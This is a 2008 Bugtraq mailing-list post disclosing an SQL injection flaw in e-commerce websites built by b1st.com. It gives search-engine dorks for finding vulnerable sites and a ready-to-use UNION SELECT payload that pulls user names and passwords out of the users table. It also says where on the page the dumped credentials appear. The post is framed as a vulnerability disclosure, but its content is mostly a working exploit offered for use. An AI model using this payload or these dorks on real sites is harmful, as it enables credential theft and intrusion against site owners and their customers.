
Date: 15 Feb 2008 19:09:08 -0000
From: hackturkiye.hackturkiye@...il.com
To: bugtraq@...urityfocus.com
Subject: Ecommerce Websites from b1st.com SQL Injection

#########################################################################
# 
#   Ecommerce Websites from b1st.com SQL Injection
#
######################################################################### 
#
# AUTHOR : S@BUN 
#
# HOME : http://www.hackturkiye.com
#
# MA&#304;L : hackturkiye.hackturkiye@...il.com
#
#########################################################################
# 
#  DORK 1 : "Ecommerce Websites from b1st.com" 
# 
#  DORK 2 : allinurl:
#
#########################################################################
   
EXPLO&#304;T WORK&#304;NG ON HTML S&#304;TES 

LOOK Combo Deals UNDER PAGE YOU W&#304;LL SEE ALL USERS USERNAME AND PASSWORD

#########################################################################
EXPLOIT : 

index.php?option=newspecial&category_id=-1/**/union/**/select/**/0,concat(name,0x3a,pwd),2,3,4,5,6,7,8/**/from/**/users/*  

#########################################################################
# S@BUN       i AM NOT HACKER      S@BUN 
#########################################################################
